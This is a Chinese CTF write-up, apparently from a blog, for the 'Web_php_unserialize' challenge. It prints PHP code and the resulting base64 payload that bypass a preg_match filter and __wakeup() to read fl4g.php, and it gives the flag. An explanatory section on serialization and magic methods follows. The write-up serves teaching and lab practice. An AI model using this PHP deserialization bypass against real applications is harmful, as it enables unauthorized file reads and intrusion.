攻防世界 web部分的Web_php_unserialize的writeup

这个题就是三个点:

1、$file改成fl4g.php;

2、绕过:preg_match('/[oc]:\d+:/i', $var)

3、跳过__wakeup()。

步骤如下:

<?php 
class Demo { 
    private $file = 'fl4g.php';//$file改成fl4g.php
}

$a= serialize(new demo);
$a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
$a= str_replace(':1:', ':2:',$a);//绕过wakeup
echo base64_encode($a);
?>

代码执行得:

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

执行即可:

flag即为:

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

 

### 解题思路 在Web_php_unserialize题目中,题目的代码会对传入的反序列化字符串进行一些检查和处理 [^2]。代码首先定义了一个名为Demo的类,包含私有变量$file和__construct()、__destruct()、__wakeup()三个魔术方法。__wakeup()方法会检查$file变量,若不等于index.php则将其重置为index.php,以此防止攻击者读取fl4g.php文件内容 [^2]。 当用户通过GET方式传入var参数时,代码会对其进行base64解码,接着使用正则表达式`/[oc]:\d+:/i`检查解码后的字符串,若匹配则阻止攻击,若不匹配则进行反序列化操作 [^2]。 为了解题,可构造一个Demo类的对象并序列化,然后对序列化字符串进行修改。将`O:4`替换为`O:+4`,` :1:`替换为` :2:`,绕过__wakeup()方法的检查,再对修改后的字符串进行base64编码,最后将编码后的字符串作为var参数的值传入URL,从而读取fl4g.php文件内容 [^2][^3]。 ### 相关知识点 - **序列化与反序列化**:序列化是将对象的状态信息转换为可以存储或传输的形式的过程,反序列化则是将序列化的数据恢复为对象的过程。在PHP中,使用`serialize()`函数进行序列化,使用`unserialize()`函数进行反序列化 [^1][^2][^3][^4]。 - **魔术方法**: - `__construct()`:在创建对象时自动调用,用于初始化对象的属性 [^2]。 - `__destruct()`:在对象被销毁或脚本结束时自动调用,可用于执行一些清理操作,如关闭文件、释放资源等 [^2][^4]。 - `__wakeup()`:在反序列化时自动调用,可用于对对象的属性进行一些初始化或检查操作 [^1][^2][^4]。 - **正则表达式匹配**:使用`preg_match()`函数执行正则表达式匹配,可用于检查字符串是否符合特定的模式。在本题中,使用正则表达式`/[oc]:\d+:/i`检查反序列化字符串是否包含特定模式,若匹配则阻止攻击 [^2]。 - **字符串替换**:使用`str_replace()`函数进行字符串替换操作,可用于修改序列化字符串,绕过__wakeup()方法的检查 [^3]。 - **Base64编码与解码**:使用`base64_encode()`函数对字符串进行Base64编码,使用`base64_decode()`函数对Base64编码的字符串进行解码 [^2][^3][^4]。 ### 示例代码 ```php <?php class Demo { private $file = 'fl4g.php'; } $a = new Demo(); $b = serialize($a); echo $b; $b = str_replace('O:4', 'O:+4', $b); $b = str_replace(':1:', ':2:', $b); $b = base64_encode($b); echo $b; ?> ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值